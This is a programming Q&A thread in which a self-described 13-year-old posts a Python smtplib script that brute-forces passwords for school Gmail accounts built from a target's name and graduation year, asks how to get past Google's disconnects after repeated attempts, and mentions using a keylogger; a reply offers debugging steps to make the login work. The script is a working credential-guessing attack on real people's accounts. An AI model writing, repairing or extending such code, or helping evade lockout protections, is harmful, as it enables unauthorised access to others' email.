Before we get started, I have to say that I'm very new to Python. It would make sense if I did something stupidly wrong, but I think I would have figured that out by now. I'm 13, and this is my first language. I've followed Python Basics Youtube tutorials, but still am missing a ton of experience and techniques.
Anyways, back to the point. I'm currently writing a script that should, in theory, crack school email accounts. They're all formatted in the same general way: [email protected]. I don't really have a reason for this, it just seems exciting. Here's my code:
FIRSTNAME = input("Target's first name: ")
LASTNAME = input("Target's last name: ")
try:
GRADYEAR = int(input("Target's graduation year: "))
except ValueError:
print("\nPlease enter a number.")
exit()
username = str(FIRSTNAME.lower()) + '.' + str(LASTNAME.lower()) + '.' + str(GRADYEAR) + '@mySchool.org'
username = username.strip()
print('''
Email: %s
''' % username)
passwfile = input("Enter the password file name: ")
if passwfile == "":
passwfile = "180-185.lst" # My default file
passwfile = open(passwfile, "r")
import smtplib
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
ExitLoop = False
for password in passwfile:
password = "{}{}".format(str(password.strip()),LASTNAME.lower())
try:
try:
smtpserver.login(username,password)
response = "\n[+] Password Found %s" % password
break;
except UnicodeEncodeError:
response = 'UNICODE ERROR\n'
except smtplib.SMTPAuthenticationError:
response = "[!] Password Incorrect or App Security Issue: %s" % password
except smtplib.SMTPServerDisconnected:
response = "\nUh oh! The server disconnected you!"
ExitLoop = True
finally:
print(response.strip())
if ExitLoop == True:
break;
input("\nPRESS ENTER TO CONTINUE")
TL;DR: Basically asks for target's information and formats it accordingly. Then for every potential password in my separate list, it attempts a login with that information (brute force).
I am aware of Google's relatively new security features, which prevent this method for a brute force unless you specifically allow less secure apps to access your account. This won't be a problem, because I don't actually need to use it on anyone (if I did I would just use a keylogger). Please understand that I am not asking for a solution to, "Why does it have a long gibberish error full of Google crap?". For whatever reason, when I try this on myself it doesn't work. I really don't understand what I'm doing wrong.
Main questions: When I run this script on myself, let's say I enter this information:
Target's first name: "John"
Target's last name: "Smith"
Target's graduation year: 2016 [ignore the fact that I'm not a senior]
Email: [email protected]
Enter the password file name: ""
*Starts for loop...*
[!] Password Incorrect or App Security Issue: 000000smith
But that's my password! It just skips over the correct line and continues attempting others in the list. I don't understand what I did wrong...can someone figure out what's wrong with my script?
I have another question, after a while of constant attempts, Google disconnects me from their SMTP server. Is there a work-around? Would connecting inside my for loop each time individually help? On the contrary, I'm sure it would cause immense lag.
BTW I'm aware of all the extra code in my program, I haven't cleaned it up yet.
I tweaked your example, used it myself, and successfully logged into a (different) email server. The only conclusion I can come to is that you're not logging in with the correct credentials (or possibly you've been locked out with too many incorrect password attempts)
Try the following steps in order (proceeding only if that step was successful):
Verify you can log in with those credentials, without using a program.
Write a simpler program, where you hard-code both the username and password in, and see if it can log in. (Don't get any user input, or read anyfiles - just a straightforward login to the server)
Just before the smtpserver.login(username,password) line, insert the following two lines:
print([(c, ord(c)) for c in username])
print([(c, ord(c)) for c in password])
Verify both the characters you're passing and the ordinal value (in case the character just looks like the correct character in your username or password.
When you're faced with a bug, always try simplifying until you get to the smallest, simplest example that shows your issue. Usually you'll find your issue during this process.